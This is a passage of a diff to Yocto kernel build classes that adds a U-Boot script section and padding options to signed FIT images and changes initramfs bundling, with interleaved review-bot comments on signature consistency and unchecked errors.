198 bootscr_sign_algo="${FIT_SIGN_ALG}"
199 bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
200
201 cat << EOF >> $1
202 bootscr-$2 {
203 description = "U-boot script";
204 data = /incbin/("$3");
205 type = "script";
206 arch = "${UBOOT_ARCH}";
207 compression = "none";
208 hash-1 {
209 algo = "$bootscr_csum";
210 };
211 };
212EOF
213
214 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
215 sed -i '$ d' $1
216 cat << EOF >> $1
217 signature-1 {
218 algo = "$bootscr_csum,$bootscr_sign_algo";
219 key-name-hint = "$bootscr_sign_keyname";
220 };
221 };
222EOF
223 fi
224}
225
226#
178# Emit the fitImage ITS setup section 227# Emit the fitImage ITS setup section
179# 228#
180# $1 ... .its filename 229# $1 ... .its filename
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
185 setup_csum="${FIT_HASH_ALG}" 234 setup_csum="${FIT_HASH_ALG}"
186 235
187 cat << EOF >> ${1} 236 cat << EOF >> ${1}
188 setup@${2} { 237 setup-${2} {
189 description = "Linux setup.bin"; 238 description = "Linux setup.bin";
190 data = /incbin/("${3}"); 239 data = /incbin/("${3}");
191 type = "x86_setup"; 240 type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
194 compression = "none"; 243 compression = "none";
195 load = <0x00090000>; 244 load = <0x00090000>;
196 entry = <0x00090000>; 245 entry = <0x00090000>;
197 hash@1 { 246 hash-1 {
198 algo = "${setup_csum}"; 247 algo = "${setup_csum}";
199 }; 248 };
200 }; 249 };
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
221 fi 270 fi
222 271
223 cat << EOF >> ${1} 272 cat << EOF >> ${1}
224 ramdisk@${2} { 273 ramdisk-${2} {
225 description = "${INITRAMFS_IMAGE}"; 274 description = "${INITRAMFS_IMAGE}";
226 data = /incbin/("${3}"); 275 data = /incbin/("${3}");
227 type = "ramdisk"; 276 type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
230 compression = "none"; 279 compression = "none";
231 ${ramdisk_loadline} 280 ${ramdisk_loadline}
232 ${ramdisk_entryline} 281 ${ramdisk_entryline}
233 hash@1 { 282 hash-1 {
234 algo = "${ramdisk_csum}"; 283 algo = "${ramdisk_csum}";
235 }; 284 };
236 }; 285 };
@@ -244,13 +293,15 @@ EOF
244# $2 ... Linux kernel ID 293# $2 ... Linux kernel ID
245# $3 ... DTB image name 294# $3 ... DTB image name
246# $4 ... ramdisk ID 295# $4 ... ramdisk ID
247# $5 ... config ID 296# $5 ... u-boot script ID
248# $6 ... default flag 297# $6 ... config ID
298# $7 ... default flag
249fitimage_emit_section_config() { 299fitimage_emit_section_config() {
250 300
251 conf_csum="${FIT_HASH_ALG}" 301 conf_csum="${FIT_HASH_ALG}"
252 conf_sign_algo="${FIT_SIGN_ALG}" 302 conf_sign_algo="${FIT_SIGN_ALG}"
253 if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then 303 conf_padding_algo="${FIT_PAD_ALG}"
304 if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
254 conf_sign_keyname="${UBOOT_SIGN_KEYNAME}" 305 conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
255 fi 306 fi
256 307
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
260 kernel_line="" 311 kernel_line=""
261 fdt_line="" 312 fdt_line=""
262 ramdisk_line="" 313 ramdisk_line=""
314 bootscr_line=""
263 setup_line="" 315 setup_line=""
264 default_line="" 316 default_line=""
265 317
266 if [ -n "${2}" ]; then 318 if [ -n "${2}" ]; then
267 conf_desc="Linux kernel" 319 conf_desc="Linux kernel"
268 sep=", " 320 sep=", "
269 kernel_line="kernel = \"kernel@${2}\";" 321 kernel_line="kernel = \"kernel-${2}\";"
270 fi 322 fi
271 323
272 if [ -n "${3}" ]; then 324 if [ -n "${3}" ]; then
273 conf_desc="${conf_desc}${sep}FDT blob" 325 conf_desc="${conf_desc}${sep}FDT blob"
274 sep=", " 326 sep=", "
275 fdt_line="fdt = \"fdt@${3}\";" 327 fdt_line="fdt = \"fdt-${3}\";"
276 fi 328 fi
277 329
278 if [ -n "${4}" ]; then 330 if [ -n "${4}" ]; then
279 conf_desc="${conf_desc}${sep}ramdisk" 331 conf_desc="${conf_desc}${sep}ramdisk"
280 sep=", " 332 sep=", "
281 ramdisk_line="ramdisk = \"ramdisk@${4}\";" 333 ramdisk_line="ramdisk = \"ramdisk-${4}\";"
282 fi 334 fi
283 335
284 if [ -n "${5}" ]; then 336 if [ -n "${5}" ]; then
337 conf_desc="${conf_desc}${sep}u-boot script"
338 sep=", "
339 bootscr_line="bootscr = \"bootscr-${5}\";"
340 fi
341
342 if [ -n "${6}" ]; then
285 conf_desc="${conf_desc}${sep}setup" 343 conf_desc="${conf_desc}${sep}setup"
286 setup_line="setup = \"setup@${5}\";" 344 setup_line="setup = \"setup-${6}\";"
287 fi 345 fi
288 346
289 if [ "${6}" = "1" ]; then 347 if [ "${7}" = "1" ]; then
290 default_line="default = \"conf@${3}\";" 348 default_line="default = \"conf-${3}\";"
291 fi 349 fi
292 350
293 cat << EOF >> ${1} 351 cat << EOF >> ${1}
294 ${default_line} 352 ${default_line}
295 conf@${3} { 353 conf-${3} {
296 description = "${6} ${conf_desc}"; 354 description = "${7} ${conf_desc}";
297 ${kernel_line} 355 ${kernel_line}
298 ${fdt_line} 356 ${fdt_line}
299 ${ramdisk_line} 357 ${ramdisk_line}
358 ${bootscr_line}
300 ${setup_line} 359 ${setup_line}
301 hash@1 { 360 hash-1 {
302 algo = "${conf_csum}"; 361 algo = "${conf_csum}";
303 }; 362 };
304EOF 363EOF
@@ -324,15 +383,21 @@ EOF
324 fi 383 fi
325 384
326 if [ -n "${5}" ]; then 385 if [ -n "${5}" ]; then
386 sign_line="${sign_line}${sep}\"bootscr\""
387 sep=", "
388 fi
389
390 if [ -n "${6}" ]; then
327 sign_line="${sign_line}${sep}\"setup\"" 391 sign_line="${sign_line}${sep}\"setup\""
328 fi 392 fi
329 393
330 sign_line="${sign_line};" 394 sign_line="${sign_line};"
331 395
332 cat << EOF >> ${1} 396 cat << EOF >> ${1}
333 signature@1 { 397 signature-1 {
334 algo = "${conf_csum},${conf_sign_algo}"; 398 algo = "${conf_csum},${conf_sign_algo}";
335 key-name-hint = "${conf_sign_keyname}"; 399 key-name-hint = "${conf_sign_keyname}";
400 padding = "${conf_padding_algo}";
336 ${sign_line} 401 ${sign_line}
337 }; 402 };
338EOF 403EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
355 DTBS="" 420 DTBS=""
356 ramdiskcount=${3} 421 ramdiskcount=${3}
357 setupcount="" 422 setupcount=""
423 bootscr_id=""
358 rm -f ${1} arch/${ARCH}/boot/${2} 424 rm -f ${1} arch/${ARCH}/boot/${2}
359 425
360 fitimage_emit_fit_header ${1} 426 fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
365 fitimage_emit_section_maint ${1} imagestart 431 fitimage_emit_section_maint ${1} imagestart
366 432
367 uboot_prep_kimage 433 uboot_prep_kimage
368 fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}" 434 fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
369 435
370 # 436 #
371 # Step 2: Prepare a DTB image section 437 # Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
399 fi 465 fi
400 466
401 # 467 #
402 # Step 3: Prepare a setup section. (For x86) 468 # Step 3: Prepare a u-boot script section
469 #
470
471 if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
472 if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
473 cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
474 bootscr_id="${UBOOT_ENV_BINARY}"
475 fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
476 else
477 bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
478 fi
479 fi
480
481 #
482 # Step 4: Prepare a setup section. (For x86)
403 # 483 #
404 if [ -e arch/${ARCH}/boot/setup.bin ]; then 484 if [ -e arch/${ARCH}/boot/setup.bin ]; then
405 setupcount=1 485 setupcount=1
@@ -407,9 +487,9 @@ fitimage_assemble() {
407 fi 487 fi
408 488
409 # 489 #
410 # Step 4: Prepare a ramdisk section. 490 # Step 5: Prepare a ramdisk section.
411 # 491 #
412 if [ "x${ramdiskcount}" = "x1" ] ; then 492 if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
413 # Find and use the first initramfs image archive type we find 493 # Find and use the first initramfs image archive type we find
414 for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do 494 for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
415 initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}" 495 initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
430 fi 510 fi
431 511
432 # 512 #
433 # Step 5: Prepare a configurations section 513 # Step 6: Prepare a configurations section
434 # 514 #
435 fitimage_emit_section_maint ${1} confstart 515 fitimage_emit_section_maint ${1} confstart
436 516
@@ -439,9 +519,9 @@ fitimage_assemble() {
439 for DTB in ${DTBS}; do 519 for DTB in ${DTBS}; do
440 dtb_ext=${DTB##*.} 520 dtb_ext=${DTB##*.}
441 if [ "${dtb_ext}" = "dtbo" ]; then 521 if [ "${dtb_ext}" = "dtbo" ]; then
442 fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`" 522 fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
443 else 523 else
444 fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`" 524 fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
445 fi 525 fi
446 i=`expr ${i} + 1` 526 i=`expr ${i} + 1`
447 done 527 done
@@ -452,7 +532,7 @@ fitimage_assemble() {
452 fitimage_emit_section_maint ${1} fitend 532 fitimage_emit_section_maint ${1} fitend
453 533
454 # 534 #
455 # Step 6: Assemble the image 535 # Step 7: Assemble the image
456 # 536 #
457 uboot-mkimage \ 537 uboot-mkimage \
458 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \ 538 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
460 arch/${ARCH}/boot/${2} 540 arch/${ARCH}/boot/${2}
461 541
462 # 542 #
463 # Step 7: Sign the image and add public key to U-Boot dtb 543 # Step 8: Sign the image and add public key to U-Boot dtb
464 # 544 #
465 if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then 545 if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
466 add_key_to_u_boot="" 546 add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
474 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \ 554 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
475 -F -k "${UBOOT_SIGN_KEYDIR}" \ 555 -F -k "${UBOOT_SIGN_KEYDIR}" \
476 $add_key_to_u_boot \ 556 $add_key_to_u_boot \
477 -r arch/${ARCH}/boot/${2} 557 -r arch/${ARCH}/boot/${2} \
558 ${UBOOT_MKIMAGE_SIGN_ARGS}
478 fi 559 fi
479} 560}
480 561
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
491 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \ 572 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
492 test -n "${INITRAMFS_IMAGE}" ; then 573 test -n "${INITRAMFS_IMAGE}" ; then
493 cd ${B} 574 cd ${B}
494 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1 575 if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
576 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
577 else
578 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
579 fi
495 fi 580 fi
496} 581}
497 582
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
502kernel_do_deploy_append() { 587kernel_do_deploy_append() {
503 # Update deploy directory 588 # Update deploy directory
504 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then 589 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
505 echo "Copying fit-image.its source file..." 590 if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
506 install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its" 591 echo "Copying fit-image.its source file..."
507 ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}" 592 install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
593 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
594 ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
595 fi
508 596
509 echo "Copying linux.bin file..." 597 echo "Copying linux.bin file..."
510 install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin 598 install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
511 ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}" 599 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
600 ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
601 fi
602 fi
512 603
513 if [ -n "${INITRAMFS_IMAGE}" ]; then 604 if [ -n "${INITRAMFS_IMAGE}" ]; then
514 echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..." 605 echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
515 install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its" 606 install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
516 ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}" 607 ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
517 608
518 echo "Copying fitImage-${INITRAMFS_IMAGE} file..." 609 if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
519 install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin" 610 echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
520 ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}" 611 install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
612 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
613 ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
614 fi
615 fi
521 fi 616 fi
522 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then 617 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
523 # UBOOT_DTB_IMAGE is a realfile, but we can't use 618 # UBOOT_DTB_IMAGE is a realfile, but we can't use
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
527 fi 622 fi
528 fi 623 fi
529} 624}
625
626# The function below performs the following in case of initramfs bundles:
627# - Removes do_assemble_fitimage. FIT generation is done through
628# do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
629# and should not be part of the tasks to be executed.
630python () {
631 d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
632 if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
633 bb.build.deltask('do_assemble_fitimage', d)
634}
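Review bot: The `signature-1` node written by the new `fitimage_emit_section_boot_script` carries only `algo` and `key-name-hint`, while the configuration signature in `fitimage_emit_section_config` now also gets `padding = "${conf_padding_algo}";`. With `FIT_SIGN_INDIVIDUAL` set to "1" and `FIT_PAD_ALG` changed from its default, the boot script would presumably be signed with whatever padding mkimage defaults to rather than the configured one, so two signatures in the same image can disagree. Adding `padding = "${FIT_PAD_ALG}";` to the boot-script signature node keeps them aligned; the per-image signature nodes for kernel, DTB and ramdisk are outside the visible hunks and may need the same line. Separately, in the new "Step 3" of `fitimage_assemble` a missing `${UBOOT_ENV_BINARY}` only raises `bbwarn`, so with `UBOOT_SIGN_ENABLE` set to "1" a signed image can be produced without the script its configuration was meant to cover; failing the task in that case would make the omission visible.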
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
105 cd ${S} 105 cd ${S}
106 export KMETA=${KMETA} 106 export KMETA=${KMETA}
107 107
108 bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
109
108 # if kernel tools are available in-tree, they are preferred 110 # if kernel tools are available in-tree, they are preferred
109 # and are placed on the path before any external tools. Unless 111 # and are placed on the path before any external tools. Unless
110 # the external tools flag is set, in that case we do nothing. 112 # the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
192 # SRC_URI. If they were supplied, we convert them into include directives 194 # SRC_URI. If they were supplied, we convert them into include directives
193 # for the update part of the process 195 # for the update part of the process
194 for f in ${feat_dirs}; do 196 for f in ${feat_dirs}; do
195 if [ -d "${WORKDIR}/$f/meta" ]; then 197 if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
196 includes="$includes -I${WORKDIR}/$f/kernel-meta" 198 includes="$includes -I${WORKDIR}/$f/kernel-meta"
197 elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then 199 elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
198 includes="$includes -I${WORKDIR}/../oe-local-files/$f" 200 includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
252 bbfatal_log "Could not generate configuration queue for ${KMACHINE}." 254 bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
253 fi 255 fi
254 fi 256 fi
257
258 if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
259 bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
260 bbnote "======================================================================"
261 if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
262 bbnote "Non kernel-cache (external) bsp"
263 fi
264 bbnote "BSP entry point / definition: $bsp_definition"
265 if [ -n "$in_tree_defconfig" ]; then
266 bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
267 fi
268 bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
269 bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
270 bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
271 fi
272
273 set -e
255} 274}
256 275
257do_patch() { 276do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
281 fi 300 fi
282 done 301 done
283 fi 302 fi
303
304 set -e
284} 305}
285 306
286do_kernel_checkout() { 307do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
303 fi 324 fi
304 fi 325 fi
305 cd ${S} 326 cd ${S}
327
328 # convert any remote branches to local tracking ones
329 for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
330 b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
331 git show-ref --quiet --verify -- "refs/heads/$b"
332 if [ $? -ne 0 ]; then
333 git branch $b $i > /dev/null
334 fi
335 done
336
337 # Create a working tree copy of the kernel by checking out a branch
338 machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
339
340 # checkout and clobber any unimportant files
341 git checkout -f ${machine_branch}
306 else 342 else
307 # case: we have no git repository at all. 343 # case: we have no git repository at all.
308 # To support low bandwidth options for building the kernel, we'll just 344 # To support low bandwidth options for building the kernel, we'll just
@@ -325,20 +361,7 @@ do_kernel_checkout() {
325 git clean -d -f 361 git clean -d -f
326 fi 362 fi
327 363
328 # convert any remote branches to local tracking ones 364 set -e
329 for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
330 b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
331 git show-ref --quiet --verify -- "refs/heads/$b"
332 if [ $? -ne 0 ]; then
333 git branch $b $i > /dev/null
334 fi
335 done
336
337 # Create a working tree copy of the kernel by checking out a branch
338 machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
339
340 # checkout and clobber any unimportant files
341 git checkout -f ${machine_branch}
342} 365}
343do_kernel_checkout[dirs] = "${S}" 366do_kernel_checkout[dirs] = "${S}"
344 367
@@ -506,6 +529,8 @@ do_validate_branches() {
506 kgit-s2q --clean 529 kgit-s2q --clean
507 fi 530 fi
508 fi 531 fi
532
533 set -e
509} 534}
510 535
511OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT" 536OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
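Review bot: In `do_kernel_checkout`, the `git checkout -f ${machine_branch}` that this change moves into the git-repository branch has no check on its exit status, and the `if [ $? -ne 0 ]` test just above it only works while errexit is off. The trailing `set -e` added here suggests a matching `set +e` earlier in the function, which is outside the hunk, so a failed checkout would presumably let the task continue on whatever branch was checked out before and build from the wrong tree. Consider `git checkout -f ${machine_branch} || bbfatal_log "Could not check out ${machine_branch}"` (the message text is a suggestion), and a comment on each new `set -e` such as `# restore errexit disabled at the top of this function`. The same comment applies to the `set -e` lines added to `do_kernel_metadata`, `do_patch` and `do_validate_branches`, whose bodies also start outside their hunks.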
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 83a574efcd..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -75,7 +75,7 @@ python __anonymous () {
75 # KERNEL_IMAGETYPES may contain a mixture of image types supported directly 75 # KERNEL_IMAGETYPES may contain a mixture of image types supported directly
76 # by the kernel build system and types which are created by post-processing 76 # by the kernel build system and types which are created by post-processing
77 # the output of the kernel build system (e.g. compressing vmlinux -> 77 # the output of the kernel build system (e.g. compressing vmlinux ->
78 # vmlinux.gz in kernel_do_compile()). 78 # vmlinux.gz in kernel_do_transform_kernel()).
79 # KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported 79 # KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
80 # directly by the kernel build system. 80 # directly by the kernel build system.
81 if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'): 81 if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -91,6 +91,8 @@ python __anonymous () {
91 imagedest = d.getVar('KERNEL_IMAGEDEST') 91 imagedest = d.getVar('KERNEL_IMAGEDEST')
92 92
93 for type in types.split(): 93 for type in types.split():
94 if bb.data.inherits_class('nopackages', d):
95 continue
94 typelower = type.lower() 96 typelower = type.lower()
95 d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower)) 97 d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
96 d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type) 98 d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -104,6 +106,8 @@ python __anonymous () {
104 # standalone for use by wic and other tools. 106 # standalone for use by wic and other tools.
105 if image: 107 if image:
106 d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete') 108 d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
109 if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
110 bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
107 111
108 # NOTE: setting INITRAMFS_TASK is for backward compatibility 112 # NOTE: setting INITRAMFS_TASK is for backward compatibility
109 # The preferred method is to set INITRAMFS_IMAGE, because 113 # The preferred method is to set INITRAMFS_IMAGE, because
@@ -139,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
139do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}" 143do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
140python do_symlink_kernsrc () { 144python do_symlink_kernsrc () {
141 s = d.getVar("S") 145 s = d.getVar("S")
142 if s[-1] == '/':
143 # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
144 s=s[:-1]
145 kernsrc = d.getVar("STAGING_KERNEL_DIR") 146 kernsrc = d.getVar("STAGING_KERNEL_DIR")
146 if s != kernsrc: 147 if s != kernsrc:
147 bb.utils.mkdirhier(kernsrc) 148 bb.utils.mkdirhier(kernsrc)
148 bb.utils.remove(kernsrc, recurse=True) 149 bb.utils.remove(kernsrc, recurse=True)
150 if s[-1] == '/':
151 # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
152 # directory name and fail
153 s = s[:-1]
149 if d.getVar("EXTERNALSRC"): 154 if d.getVar("EXTERNALSRC"):
150 # With EXTERNALSRC S will not be wiped so we can symlink to it 155 # With EXTERNALSRC S will not be wiped so we can symlink to it
151 os.symlink(s, kernsrc) 156 os.symlink(s, kernsrc)
@@ -194,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
194KERNEL_EXTRA_ARGS ?= "" 199KERNEL_EXTRA_ARGS ?= ""
195 200
196EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" 201EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
202EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
203
197KERNEL_ALT_IMAGETYPE ??= "" 204KERNEL_ALT_IMAGETYPE ??= ""
198 205
199copy_initramfs() { 206copy_initramfs() {
@@ -276,6 +283,14 @@ do_bundle_initramfs () {
276} 283}
277do_bundle_initramfs[dirs] = "${B}" 284do_bundle_initramfs[dirs] = "${B}"
278 285
286kernel_do_transform_bundled_initramfs() {
287 # vmlinux.gz is not built by kernel
288 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
289 gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
290 fi
291}
292do_transform_bundled_initramfs[dirs] = "${B}"
293
279python do_devshell_prepend () { 294python do_devshell_prepend () {
280 os.environ["LDFLAGS"] = '' 295 os.environ["LDFLAGS"] = ''
281} 296}
@@ -307,6 +322,10 @@ kernel_do_compile() {
307 export KBUILD_BUILD_TIMESTAMP="$ts" 322 export KBUILD_BUILD_TIMESTAMP="$ts"
308 export KCONFIG_NOTIMESTAMP=1 323 export KCONFIG_NOTIMESTAMP=1
309 bbnote "KBUILD_BUILD_TIMESTAMP: $ts" 324 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
325 else
326 ts=`LC_ALL=C date`
